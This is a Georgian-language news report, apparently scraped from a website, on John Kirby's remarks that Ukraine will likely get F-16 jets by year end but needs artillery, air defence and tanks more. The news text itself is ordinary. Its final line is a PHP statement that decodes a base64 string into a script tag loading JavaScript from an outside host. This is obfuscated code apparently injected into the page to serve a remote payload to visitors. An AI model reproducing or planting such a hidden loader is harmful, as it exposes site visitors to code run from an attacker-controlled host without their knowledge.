celsiusi
ავერსი საქკაბელი

უკრაინა F-16-ის ტიპის მოიერიშე თვითმფრინავებს, სავარაუდოდ, წლის ბოლომდე მიიღებს, – ამის შესახებ აშშ-ს სტრატეგიული კომუნიკაციების ეროვნული უშიშროების საბჭოს კოორდინატორმა, ჯონ კირბიმ „ფოქს ნიუსთან“ ინტერვიუში განაცხადა.

მისივე თქმით, ნაკლებად, სავარაუდოა, ამან შეცვალოს ომის მიმდინარეობა.

„F-16-ები უკრაინას მიეწოდება, სავარაუდოდ, წლის ბოლომდე, თუმცა, ჩვენი შეფასებით, მხოლოდ F-16-ები ვერ შეძლებენ ომის მიმდინარეობის შეცვლას, რადგან მათ ნამდვილად სჭირდებათ არტილერია. ასე რომ, აშშ-ს პრეზიდენტმა, ჯო ბაიდენმა მიიღო რთული გადაწყვეტილება კასეტური საბრძოლო მასალის გადაცემის შესახებ“, – აღნიშნა კირბიმ.

როგოც კირბიმ აღნიშნა, უკრაინას ყველაზე მეტად სჭირდება არა თვითმფრინავები, არამედ არტილერია.

„რაც მათ ნამდვილად სჭირდებათ, არის არტილერია, საბრძოლო მასალა, საჰაერო თავდაცვა და ჯავშანტექნიკა – ტანკები. ოთხივე შემთხვევაში, ჩვენ გავუწიეთ წარმოუდგენელი რაოდენობით დახმარება და, გულწრფელად რომ ვთქვათ, უპრეცედენტო სიჩქარით. ეს არის ის ოთხი პოზიცია, რაც მათ სჭირდებათ“, – განაცხადა კირბიმ. 

529
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");